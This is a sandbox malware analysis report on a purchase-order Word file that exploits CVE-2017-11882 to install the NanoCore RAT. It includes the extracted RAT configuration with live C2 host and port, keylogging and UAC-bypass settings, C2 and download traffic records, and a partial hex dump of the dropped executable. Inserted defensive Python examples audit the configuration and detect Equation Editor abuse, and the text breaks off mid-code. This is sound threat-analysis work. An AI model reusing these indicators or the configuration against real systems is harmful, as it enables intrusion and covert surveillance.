Analysis Report NEW ORDER Ref PO-298721.doc

Overview

General Information

Sample Name: NEW ORDER Ref PO-298721.doc
Analysis ID: 431710
MD5: f343ce75606d600a978f4593ad92a5ed
SHA1: 0aca94dd295f12f4deb4505a3f3dd470a7a59752
SHA256: 194abfeb6f78221b43aff1da8d0aceead6282979840d9aa43bfc20d190ba0ddd
Tags: doc

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Nanocore RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp Malware Configuration Extractor: NanoCore (extractor JSON shown one field per line; the embedded task XML is shown with its \r\n escapes decoded)
  Version: 1.2.2.0
  Mutex: f9198f9a-66a7-4bba-ab1c-dff8091c
  Group: Default
  Domain1: tzitziklishop.ddns.net
  Domain2: tzitziklishop.ddns.net
  Port: 1665
  KeyboardLogging: Enable
  RunOnStartup: Enable
  RequestElevation: Disable
  BypassUAC: Enable
  ClearZoneIdentifier: Enable
  ClearAccessControl: Disable
  SetCriticalProcess: Disable
  PreventSystemSleep: Enable
  ActivateAwayMode: Disable
  EnableDebugMode: Disable
  RunDelay: 0
  ConnectDelay: 4000
  RestartDelay: 5000
  TimeoutInterval: 5000
  KeepAliveTimeout: 30000
  MutexTimeout: 5000
  LanTimeout: 2500
  WanTimeout: 8000
  BufferSize: ffff0000
  MaxPacketSize: 0000a000
  GCThreshold: 0000a000
  UseCustomDNS: Enable
  PrimaryDNSServer: (empty)
  BackupDNSServer: 37.235.1.177
  BypassUserAccountControlData (Task Scheduler task definition; the extractor output ends at the truncated closing tag "</Task"):
    <?xml version="1.0" encoding="UTF-16"?>
    <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
      <RegistrationInfo />
      <Triggers />
      <Principals>
        <Principal id="Author">
          <LogonType>InteractiveToken</LogonType>
          <RunLevel>HighestAvailable</RunLevel>
        </Principal>
      </Principals>
      <Settings>
        <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
        <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
        <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
        <AllowHardTerminate>true</AllowHardTerminate>
        <StartWhenAvailable>false</StartWhenAvailable>
        <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
        <IdleSettings>
          <StopOnIdleEnd>false</StopOnIdleEnd>
          <RestartOnIdle>false</RestartOnIdle>
        </IdleSettings>
        <AllowStartOnDemand>true</AllowStartOnDemand>
        <Enabled>true</Enabled>
        <Hidden>false</Hidden>
        <RunOnlyIfIdle>false</RunOnlyIfIdle>
        <WakeToRun>false</WakeToRun>
        <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
        <Priority>4</Priority>
      </Settings>
      <Actions Context="Author">
        <Exec>
          <Command>"#EXECUTABLEPATH"</Command>
          <Arguments>$(Arg0)</Arguments>
        </Exec>
      </Actions>
    </Task
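The extracted configuration answers most of the triage questions on its own if it is read the right way. The script below is an added example, not part of the Joe Sandbox report and not NanoCore's own code: it takes the fields above (copied from the extractor output, abridged to the ones used), pulls out the network indicators, lists the enabled capabilities, and audits the embedded BypassUserAccountControlData task definition for the properties that make it a generic elevated launcher. The task XML is reconstructed from the report with its escapes decoded; its Settings block is abridged and the truncated "</Task" is closed so that it parses. The dynamic-DNS suffix list is an assumption for illustration, and the reading of "#EXECUTABLEPATH" as an install-time placeholder is the editor's interpretation of the field, not something the report states.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Fields copied from the extractor output in the report (abridged to those used here).
NANOCORE_CONFIG = {
    "Version": "1.2.2.0",
    "Mutex": "f9198f9a-66a7-4bba-ab1c-dff8091c",
    "Domain1": "tzitziklishop.ddns.net",
    "Domain2": "tzitziklishop.ddns.net",
    "Port": 1665,
    "KeyboardLogging": "Enable",
    "RunOnStartup": "Enable",
    "RequestElevation": "Disable",
    "BypassUAC": "Enable",
    "ClearZoneIdentifier": "Enable",
    "UseCustomDNS": "Enable",
    "PrimaryDNSServer": "",
    "BackupDNSServer": "37.235.1.177",
}

# BypassUserAccountControlData with the \r\n escapes decoded. Constructed from the
# report: <Settings> is abridged and the truncated "</Task" is closed so it parses.
TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo />
  <Triggers />
  <Principals>
    <Principal id="Author">
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>"#EXECUTABLEPATH"</Command>
      <Arguments>$(Arg0)</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Assumed, incomplete list of free dynamic-DNS suffixes; extend for your environment.
DYNDNS_SUFFIXES = (".ddns.net", ".no-ip.org", ".duckdns.org", ".hopto.org")


def network_iocs(cfg):
    """C2 hosts/port and the resolvers the implant uses instead of the host's."""
    hosts = sorted({cfg[k] for k in ("Domain1", "Domain2") if cfg.get(k)})
    dns = [cfg[k] for k in ("PrimaryDNSServer", "BackupDNSServer") if cfg.get(k)]
    return {
        "c2_hosts": hosts,
        "c2_port": int(cfg["Port"]),
        "dynamic_dns": [h for h in hosts if h.endswith(DYNDNS_SUFFIXES)],
        # With UseCustomDNS the RAT resolves the C2 name through these servers itself,
        # so the Windows resolver (and anything that logs it) never sees the query.
        "custom_dns_servers": dns if cfg.get("UseCustomDNS") == "Enable" else [],
    }


def enabled_capabilities(cfg):
    """The switches that matter for scoping: keylogging, persistence, UAC, MOTW."""
    keys = ("KeyboardLogging", "RunOnStartup", "BypassUAC", "ClearZoneIdentifier")
    return [k for k in keys if cfg.get(k) == "Enable"]


def audit_task_xml(xml_text):
    """Return the reasons this task definition is a generic elevated launcher."""
    # Drop the UTF-16 declaration: the text is already decoded to str.
    root = ET.fromstring(re.sub(r"^<\?xml[^>]*\?>\s*", "", xml_text))
    findings = []
    if root.findtext(f".//{TASK_NS}RunLevel") == "HighestAvailable":
        findings.append("RunLevel=HighestAvailable: runs with the full admin token "
                        "when the logged-on user is an administrator")
    triggers = root.find(f"{TASK_NS}Triggers")
    if triggers is not None and len(triggers) == 0:
        findings.append("no triggers: the task never fires by itself, it exists to be "
                        "started on demand (AllowStartOnDemand)")
    for ex in root.iter(f"{TASK_NS}Exec"):
        cmd = ex.findtext(f"{TASK_NS}Command") or ""
        args = ex.findtext(f"{TASK_NS}Arguments") or ""
        if "#EXECUTABLEPATH" in cmd:
            findings.append("Command is the template placeholder #EXECUTABLEPATH, "
                            "substituted when the task is registered")
        if re.search(r"\$\(Arg\d+\)", args):
            findings.append("Arguments use $(ArgN): the real command line is supplied "
                            "by whoever starts the task")
    return findings


if __name__ == "__main__":
    print(network_iocs(NANOCORE_CONFIG))
    print(enabled_capabilities(NANOCORE_CONFIG))
    for f in audit_task_xml(TASK_XML):
        print("-", f)
```

The same audit applies to any task XML pulled from C:\Windows\System32\Tasks during an investigation: a task with RunLevel HighestAvailable, no triggers and $(ArgN) arguments is worth a look regardless of which family registered it.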
Multi AV Scanner detection for domain / URL
Source: carbinz.gq Virustotal: Detection: 15%
Source: tzitziklishop.ddns.net Virustotal: Detection: 8%
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catx[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Roaming\cat464923.exe ReversingLabs: Detection: 36%
Multi AV Scanner detection for submitted file
Source: NEW ORDER Ref PO-298721.doc Virustotal: Detection: 23%
Source: NEW ORDER Ref PO-298721.doc ReversingLabs: Detection: 34%
Yara detected Nanocore RAT
Source: Yara match File source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2348105483.0000000002491000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY
Source: Yara match File source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\cat464923.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catx[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 18.0.smtpsvc.exe.400000.4.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 17.0.smtpsvc.exe.400000.2.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 17.0.smtpsvc.exe.400000.4.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 16.2.cat464923.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 5.2.cat464923.exe.400000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 16.0.cat464923.exe.400000.1.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 5.0.cat464923.exe.400000.1.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 16.0.cat464923.exe.400000.3.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 17.2.smtpsvc.exe.400000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 18.0.smtpsvc.exe.400000.2.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 5.2.cat464923.exe.4a0000.5.unpack Avira: Label: TR/NanoCore.fadte
Source: 18.2.smtpsvc.exe.400000.1.unpack Avira: Label: TR/Dropper.Gen
Source: 5.0.cat464923.exe.400000.3.unpack Avira: Label: TR/Dropper.MSIL.Gen7

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cat464923.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: symbols\dll\System.pdb source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source: Binary string: j,C:\Windows\System.pdb@#P source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\geNROzYNTy\src\obj\Debug\grlL.pdb source: smtpsvc.exe
Source: Binary string: .pdbD source: cat464923.exe, 00000005.00000002.2352627093.00000000060EC000.00000004.00000001.sdmp
Source: Binary string: grlL.pdb0 source: cat464923.exe, 00000005.00000002.2347577380.000000000055D000.00000004.00000020.sdmp
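The three Sigma hits in this report (EQNEDT32.EXE spawning a process, EQNEDT32.EXE connecting to the internet, EQNEDT32.EXE dropping a file) are the whole CVE-2017-11882 chain seen from the endpoint. The code below is an added example, not part of the report and not the Sigma project's rules: it applies those three conditions to Sysmon-style process, network and file events and correlates "wrote a file" with "then launched it" into a single dropper alert. The events are constructed to mirror the report's process tree; the field names follow Sysmon (EventID 1, 3, 11), and the PIDs and the svchost.exe parent of the -Embedding launch are assumptions, not taken from the report.

```python
import ntpath

EQNEDT32 = "eqnedt32.exe"
EQN_PATH = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
ROAMING_EXE = r"C:\Users\user\AppData\Roaming\cat464923.exe"


def _image_name(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path or "").lower()


# Constructed Sysmon-style events modelled on the report's behaviour.
# EventID 1 = process create, 3 = network connection, 11 = file create.
# PIDs (2100, 2324, 1900) and the svchost.exe parent are assumptions.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 2100, "Image": EQN_PATH,
     "CommandLine": f'"{EQN_PATH}" -Embedding',
     "ParentImage": r"C:\Windows\System32\svchost.exe", "ParentProcessId": 700},
    {"EventID": 3, "ProcessId": 2100, "Image": EQN_PATH,
     "DestinationIp": "185.239.243.112", "DestinationPort": 80},
    {"EventID": 11, "ProcessId": 2100, "Image": EQN_PATH,
     "TargetFilename": ROAMING_EXE},
    {"EventID": 1, "ProcessId": 2324, "Image": ROAMING_EXE,
     "CommandLine": ROAMING_EXE, "ParentImage": EQN_PATH, "ParentProcessId": 2100},
    {"EventID": 11, "ProcessId": 1900,
     "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"
                       r"\Content.Word\~WRS{B4C37CD3-97C0-4A14-814E-1968BCE52029}.tmp"},
]


def detect_equation_editor_abuse(events):
    """Return (rule, detail) pairs for Equation Editor behaviour that never happens legitimately.

    EQNEDT32.EXE only renders embedded equations: it has no reason to create
    processes, open sockets or write files, so each condition is high-confidence
    on its own. The '-Embedding' launch itself is normal (any document with an
    equation object causes it) and is deliberately not flagged.
    """
    alerts = []
    written_by = {}  # EQNEDT32 pid -> lower-cased paths it has written so far
    for e in events:
        eid, image = e.get("EventID"), _image_name(e.get("Image"))
        if eid == 3 and image == EQNEDT32:
            alerts.append(("eqnedt32_network_connection",
                           f'{e["DestinationIp"]}:{e["DestinationPort"]}'))
        elif eid == 11 and image == EQNEDT32:
            written_by.setdefault(e["ProcessId"], set()).add(e["TargetFilename"].lower())
            alerts.append(("eqnedt32_file_write", e["TargetFilename"]))
        elif eid == 1 and _image_name(e.get("ParentImage")) == EQNEDT32:
            alerts.append(("eqnedt32_spawned_process", e["Image"]))
            # The dropper pattern: the same EQNEDT32 instance wrote the binary it now runs.
            if e["Image"].lower() in written_by.get(e.get("ParentProcessId"), set()):
                alerts.append(("eqnedt32_dropped_and_executed", e["Image"]))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect_equation_editor_abuse(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

On a real telemetry pipeline the only tuning usually needed is on the file-write rule, and even there an allowlist of Equation Editor's own temporary files is enough; the process and network rules can go straight to alerting.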

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: carbinz.gq
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49168 -> 103.133.106.117:1665 (the same alert repeats for source ports 49169 through 49181: 14 separate connection attempts to port 1665, the C2 port in the extracted configuration; the report does not list the resolution explicitly, but tzitziklishop.ddns.net is the only C2 name queried, so 103.133.106.117 is most likely its address at analysis time)
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: tzitziklishop.ddns.net
Uses dynamic DNS services
Source: unknown DNS query: name: tzitziklishop.ddns.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 103.133.106.117:1665
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 09 Jun 2021 05:47:55 GMT
  Content-Type: application/x-msdownload
  Content-Length: 736256
  Last-Modified: Tue, 08 Jun 2021 16:00:42 GMT
  Connection: keep-alive
  ETag: "60bf942a-b3c00"
  Accept-Ranges: bytes
  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bb 6a bf 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 32 0b 00 00 08 00 00 00 00 00 00 c2 51 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 51 0b 00 4f 00 00 00 00 60 0b 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 38 50 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c8 31 0b 00 00 20 00 00 00 32 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 60 0b 00 00 06 00 00 00 34 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 51 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 ab 01 00 08 cd 00 00 03 00 00 00 6b 00 00 06 b0 78 02 00 88 d7 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8a 02 72 01 00 00 70 7d 01 00 00 04 02 14 7d 02 00 00 04 02 28 14 00 00 0a 00 00 02 28 06 00 00 06 00 2a 00 13 30 04 00 3f 01 00 00 01 00 00 11 00 02 7b 11 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2d 5c 02 7b 0d 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2d 45 02 7b 10 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2d 2e 02 7b 0f 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2d 17 02 7b 0e 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2b 01 17 13 04 11 04 2c 11 00 72 5d 00 00 70 28 17 00 00 0a 26 38 b2 00 00 00 02 7b 01 00 00 04 73 18 00 00 0a 0a 1f 0b 8d 3d 00 00 01 25 16 72 79 00 00 70 a2 25 17 02 7b 11 00 00 04 6f 15 00 00 0a a2 25 18 72 10 01 00 70 a2 25 19 02 7b 10 00 00 04 6f 15 00 00 0a a2 25 1a 72 10 01 00 70 a2 25 1b 02 7b 0e 00 00 04 6f 15 00 00 0a a2 25 1c 72 10 01 00 70 a2 25 1d 02 7b 0f 00 00 04 6f 15 00 00 0a a2 25 1e 72 10 01 00 70 a2 25 1f 09 02 7b 0d 00 00 04 6f 15 00 00 0a a2 25 1f 0a 72
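The response above carries everything needed to classify the download without running it: the Content-Type, the MZ/PE headers, the section table and the CLR header that marks it as a .NET assembly (which is what the Avira labels TR/Dropper.MSIL.* on the unpacked files also say). The parser below is an added example, not part of the report: it reads the first 0x260 bytes of the body, transcribed from the Data Raw dump above, far enough to answer the first-pass questions (real PE? which machine? when linked? which sections? .NET?) and checks the declared Content-Length against the end of the last section to tell whether anything is appended after the PE. The response headers in the sample are the ones shown in the report; the parser handles PE32 only, which is all this sample needs.

```python
import struct
from datetime import datetime, timezone

# Constructed input: the first 0x260 bytes of the catx.exe response body,
# transcribed from the report's Data Raw dump (file offsets 0x000-0x25f).
SAMPLE_BODY = bytes.fromhex(
    "4d5a90000300000004000000ffff0000b8000000000000004000000000000000"  # 0x000 DOS header
    "0000000000000000000000000000000000000000000000000000000080000000"  # 0x020 e_lfanew = 0x80
    "0e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f"  # 0x040 DOS stub
    "742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000"  # 0x060
    "504500004c010300bb6abf600000000000000000e00002010b01300000320b00"  # 0x080 "PE", COFF, optional header
    "0008000000000000c2510b000020000000600b00000040000020000000020000"  # 0x0a0
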